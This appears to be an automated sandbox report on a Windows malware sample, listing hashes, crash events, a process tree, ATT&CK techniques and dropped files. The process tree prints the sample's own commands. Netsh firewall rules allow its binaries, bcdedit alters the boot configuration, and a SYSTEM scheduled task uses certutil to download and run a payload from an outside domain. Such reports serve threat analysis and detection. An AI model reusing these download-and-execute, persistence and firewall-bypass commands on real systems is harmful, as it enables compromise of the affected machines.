47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3

General

Target

47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
Size

3.9MB
MD5

3417c1eb5191047cf674e388359f6341
SHA1

5949faabae447fee4ab3ce69a34953474efdfcb3
SHA256

47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3
SHA512

2c2c3e5222988c0e8bc4b9eecbc0bccee7e3382a3ce67f912a1d384a89a084c61c16c5fb0d27175eabcb55d927828670a53f6f5f86f84dbdb37b81c8f490f43d

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

2224 bcdedit.exe

pid	process
2224	bcdedit.exe

Program crash 58 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4928	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
4156	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
4380	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
2844	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
3016	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
4484	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
3984	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
4192	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
4180	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
4064	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
436	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
4920	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
4656	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
2248	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
3864	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
1464	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
3424	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
4788	2896	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
4012	3204	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
556	3204	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
3820	3204	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
2808	3204	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
2236	3204	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
2880	3204	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
3456	3204	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
3540	3204	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
2096	3204	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
4832	3204	WerFault.exe	47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
4172	4552	WerFault.exe	csrss.exe
384	4552	WerFault.exe	csrss.exe
2656	4552	WerFault.exe	csrss.exe
3664	4552	WerFault.exe	csrss.exe
4732	4552	WerFault.exe	csrss.exe
1512	4552	WerFault.exe	csrss.exe
4436	4552	WerFault.exe	csrss.exe
3756	4552	WerFault.exe	csrss.exe
2284	4552	WerFault.exe	csrss.exe
4392	4552	WerFault.exe	csrss.exe
1092	4552	WerFault.exe	csrss.exe
4484	4552	WerFault.exe	csrss.exe
2020	4552	WerFault.exe	csrss.exe
4196	4552	WerFault.exe	csrss.exe
4144	4552	WerFault.exe	csrss.exe
1484	4552	WerFault.exe	csrss.exe
4508	4552	WerFault.exe	csrss.exe
2080	4552	WerFault.exe	csrss.exe
5088	4552	WerFault.exe	csrss.exe
1320	4552	WerFault.exe	csrss.exe
4072	4552	WerFault.exe	csrss.exe
1444	4552	WerFault.exe	csrss.exe
756	4552	WerFault.exe	csrss.exe
3036	4552	WerFault.exe	csrss.exe
4468	4552	WerFault.exe	csrss.exe
224	4552	WerFault.exe	csrss.exe
1824	4552	WerFault.exe	csrss.exe
2880	4552	WerFault.exe	csrss.exe
4336	4552	WerFault.exe	csrss.exe
1332	4552	WerFault.exe	csrss.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3720 schtasks.exe
2676 schtasks.exe

pid	process
3720	schtasks.exe
2676	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
"C:\Users\Admin\AppData\Local\Temp\47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe"
1⤵
PID:2896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 332
2⤵
- Program crash
PID:4928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 352
2⤵
- Program crash
PID:4156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 352
2⤵
- Program crash
PID:4380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 608
2⤵
- Program crash
PID:2844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 708
2⤵
- Program crash
PID:3016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 724
2⤵
- Program crash
PID:4484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 724
2⤵
- Program crash
PID:3984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 756
2⤵
- Program crash
PID:4192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 776
2⤵
- Program crash
PID:4180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 632
2⤵
- Program crash
PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 800
2⤵
- Program crash
PID:436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 900
2⤵
- Program crash
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 916
2⤵
- Program crash
PID:4656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 624
2⤵
- Program crash
PID:2248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 764
2⤵
- Program crash
PID:3864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 644
2⤵
- Program crash
PID:1464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 660
2⤵
- Program crash
PID:3424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 956
2⤵
- Program crash
PID:4788

C:\Users\Admin\AppData\Local\Temp\47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe
"C:\Users\Admin\AppData\Local\Temp\47cb648d5981581d314c94169cfefdf30a50654f4dbadac93581be0f4947d1c3.exe"
2⤵
PID:3204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 296
3⤵
- Program crash
PID:4012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 316
3⤵
- Program crash
PID:556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 300
3⤵
- Program crash
PID:3820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 584
3⤵
- Program crash
PID:2808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 684
3⤵
- Program crash
PID:2236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 700
3⤵
- Program crash
PID:2880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 700
3⤵
- Program crash
PID:3456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 720
3⤵
- Program crash
PID:3540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 732
3⤵
- Program crash
PID:2096

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"
3⤵
PID:4036

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
PID:1376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 748
3⤵
- Program crash
PID:4832

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 240
4⤵
- Program crash
PID:4172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 352
4⤵
- Program crash
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 336
4⤵
- Program crash
PID:2656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 508
4⤵
- Program crash
PID:3664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 508
4⤵
- Program crash
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 904
4⤵
- Program crash
PID:1512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 904
4⤵
- Program crash
PID:4436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 940
4⤵
- Program crash
PID:3756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 948
4⤵
- Program crash
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 892
4⤵
- Program crash
PID:4392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 856
4⤵
- Program crash
PID:1092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 904
4⤵
- Program crash
PID:4484

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:2224

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:2052

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:3720

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:2676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 616
4⤵
- Program crash
PID:2020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1036
4⤵
- Program crash
PID:4196

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1068
4⤵
- Program crash
PID:4144

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 968
4⤵
- Program crash
PID:1484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1016
4⤵
- Program crash
PID:4508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1092
4⤵
- Program crash
PID:2080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1016
4⤵
- Program crash
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 880
4⤵
- Program crash
PID:1320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1552
4⤵
- Program crash
PID:4072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1812
4⤵
- Program crash
PID:1444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1812
4⤵
- Program crash
PID:756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1844
4⤵
- Program crash
PID:3036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1920
4⤵
- Program crash
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1936
4⤵
- Program crash
PID:224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1928
4⤵
- Program crash
PID:1824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1948
4⤵
- Program crash
PID:2880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1980
4⤵
- Program crash
PID:4336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 1948
4⤵
- Program crash
PID:1332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2896 -ip 2896
1⤵
PID:3756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2896 -ip 2896
1⤵
PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2896 -ip 2896
1⤵
PID:2052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2896 -ip 2896
1⤵
PID:1008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2896 -ip 2896
1⤵
PID:1856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2896 -ip 2896
1⤵
PID:4672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2896 -ip 2896
1⤵
PID:4384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2896 -ip 2896
1⤵
PID:4284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2896 -ip 2896
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2896 -ip 2896
1⤵
PID:4752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2896 -ip 2896
1⤵
PID:4004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2896 -ip 2896
1⤵
PID:3568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2896 -ip 2896
1⤵
PID:1300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 2896 -ip 2896
1⤵
PID:2252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2896 -ip 2896
1⤵
PID:1324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2896 -ip 2896
1⤵
PID:4700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2896 -ip 2896
1⤵
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
PID:3668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2896 -ip 2896
1⤵
PID:5100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3204 -ip 3204
1⤵
PID:348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 3204 -ip 3204
1⤵
PID:228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3204 -ip 3204
1⤵
PID:2796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3204 -ip 3204
1⤵
PID:5000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3204 -ip 3204
1⤵
PID:3916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3204 -ip 3204
1⤵
PID:2424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3204 -ip 3204
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3204 -ip 3204
1⤵
PID:3616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3204 -ip 3204
1⤵
PID:1120

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes
1⤵
PID:820

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
1⤵
PID:3396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3204 -ip 3204
1⤵
PID:1480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4552 -ip 4552
1⤵
PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4552 -ip 4552
1⤵
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4552 -ip 4552
1⤵
PID:1852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4552 -ip 4552
1⤵
PID:3352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4552 -ip 4552
1⤵
PID:1672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4552 -ip 4552
1⤵
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4552 -ip 4552
1⤵
PID:1508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4552 -ip 4552
1⤵
PID:3952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4552 -ip 4552
1⤵
PID:2524

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4552 -ip 4552
1⤵
PID:4844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4552 -ip 4552
1⤵
PID:3224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4552 -ip 4552
1⤵
PID:4396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4552 -ip 4552
1⤵
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4552 -ip 4552
1⤵
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4552 -ip 4552
1⤵
PID:3476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4552 -ip 4552
1⤵
PID:1296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4552 -ip 4552
1⤵
PID:4160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4552 -ip 4552
1⤵
PID:3480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4552 -ip 4552
1⤵
PID:376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4552 -ip 4552
1⤵
PID:2072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4552 -ip 4552
1⤵
PID:1336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 4552 -ip 4552
1⤵
PID:5032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4552 -ip 4552
1⤵
PID:4020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 4552 -ip 4552
1⤵
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4552 -ip 4552
1⤵
PID:1404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 4552 -ip 4552
1⤵
PID:3752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 4552 -ip 4552
1⤵
PID:244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 4552 -ip 4552
1⤵
PID:2748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4552 -ip 4552
1⤵
PID:3332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 4552 -ip 4552
1⤵
PID:2192

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
25KB

MD5
d0da44adaf1fdf2f573209feceecd56b

SHA1
f183fef11d3bcbb8061adaf9d83dcbeca161c391

SHA256
03c5c8ef5a9682cb59a54a664545f607c7348741263ad73204028ef13be5250f

SHA512
a695979467e9642852ede356bd95d672d9a91a16d93f635a1aae2509e5385ba294325ef7b59ae4cd184c3f7308e9abbb7acc487c5cab6f159d42d894ec7003d3

Download Submit
C:\Windows\rss\csrss.exe
Filesize
27KB

MD5
3423ea935fc90e43e34a173ea7d97c71

SHA1
894b66b11ac064cd66c5dff5dbf21325db1eef14

SHA256
82993a207986ca63f40cdab17260eb49d5d4ed265c47e56490877cde9b438f6a

SHA512
42f9cb3f2b1da195aa9ee6918075a4e59e335dedaecd04f5498fd38dcd41e3a07a444f1519a58170ecbb6da86fab649f684c0ef0a5419689d2b2c50e1a4bc22d

Download Submit
C:\Windows\rss\csrss.exe
Filesize
17KB

MD5
64c28c2c67fbc5b420ec5c3335756fb7

SHA1
71ed699bb2781acb5272152a7e57e0c150758582

SHA256
be10a8bec95379ba85d3f4c378e6092874dc8b46e236ec59a5525b24e344d749

SHA512
411b0f7af3ea592c576a50a23cc2fe689ab56d29e842c91189cc7c81e3090b8676991b1fa1fcca3618f6db1a1a61efed2c78e0257b1d9ae95a49a2d483f6bce0

Download Submit
memory/820-138-0x0000000000000000-mapping.dmp

Download
memory/1376-139-0x0000000000000000-mapping.dmp

Download
memory/2052-148-0x0000000000000000-mapping.dmp

Download
memory/2224-150-0x0000000000000000-mapping.dmp

Download
memory/2676-144-0x0000000000000000-mapping.dmp

Download
memory/2896-130-0x000000000154F000-0x00000000018F5000-memory.dmp

Filesize
3.6MB

Download
memory/2896-132-0x0000000000400000-0x0000000001022000-memory.dmp

Filesize
12.1MB

Download
memory/2896-131-0x0000000001900000-0x0000000001FF5000-memory.dmp

Filesize
7.0MB

Download
memory/3204-136-0x0000000000400000-0x0000000001022000-memory.dmp

Filesize
12.1MB

Download
memory/3204-135-0x0000000001900000-0x0000000001FF5000-memory.dmp

Filesize
7.0MB

Download
memory/3204-134-0x0000000001558000-0x00000000018FE000-memory.dmp

Filesize
3.6MB

Download
memory/3204-133-0x0000000000000000-mapping.dmp

Download
memory/3396-140-0x0000000000000000-mapping.dmp

Download
memory/3720-145-0x0000000000000000-mapping.dmp

Download
memory/4036-137-0x0000000000000000-mapping.dmp

Download
memory/4552-147-0x0000000000400000-0x0000000001022000-memory.dmp

Filesize
12.1MB

Download
memory/4552-146-0x0000000001A00000-0x0000000001DA6000-memory.dmp

Filesize
3.6MB

Download
memory/4552-141-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads